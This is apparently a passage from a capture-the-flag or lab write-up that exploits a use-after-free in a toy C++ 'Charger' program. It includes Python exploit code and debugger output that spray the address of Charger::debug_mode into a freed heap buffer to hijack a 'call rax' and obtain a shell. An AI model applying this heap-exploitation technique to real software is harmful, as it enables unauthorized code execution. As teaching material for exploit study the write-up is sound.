Additionally, we know that each charge plug’s destructor is invoked under two conditions: when the user explicitly removes it (option 2), or when the vector is destroyed in the Charger’s own destructor (bug). This gives us an opportunity to create a ChargeGun
-sized buffer which is free‘d after the user exits main
; if we can create a tcache of user-controlled data, we can try to invoke the address of Charger::debug_mode
and get a shell.
To control the value of RAX, we can play with loops of creating, and corresponding loops of destroying, the description
buffer. From analyzing the toy code earlier, we know that the vector’s internal size will equal 23+N-1 after one push operation.
We can perform fuzzing exercises by creating different amounts of buffers, free-ing the first one (index 0
), and allowing the UAF condition to take the spotlight.
In this case, three is the magic number, yielding a buffer of size 23+3-1 → 25 → 32. We can create a buffer somewhat less than 32 bytes in order to achieve our goal. For simplicity, we can start use a 24-byte payload, since it will neatly fit three eight-byte addresses and provide eight bytes of headroom:
create_iters = 3
payload_size = create_iters * 8
payload = "A" * payload_size
for _ in range(create_iters):
p.sendline("1")
p.sendline("1")
p.sendline(str(payload_size))
p.sendline(payload)
p.sendline("2")
p.sendline("0")
p.sendline("6")
Our fuzz payload is at RAX.
Segmentation Fault
...
wdb> x/i $pc
0x402074 <Charger::on_port_disconnected+142>: call rax
wdb> print $rax
$8 = 0x4141414141414141
Now, let’s modify the payload to send the address of Chager::debug_mode
:
wdb> print Charger::debug_mode
$9 = 0x402248
We can spray this address on each iteration of the loop:
create_iters = 3
payload_size = create_iters * 8
debug_addr = p64(0x402248)
payload = b''.join([debug_addr for _ in range(create_iters)])
for _ in range(create_iters):
p.sendline("1")
p.sendline("1")
p.sendline(str(payload_size))
p.sendline(payload)
This gives us a shell.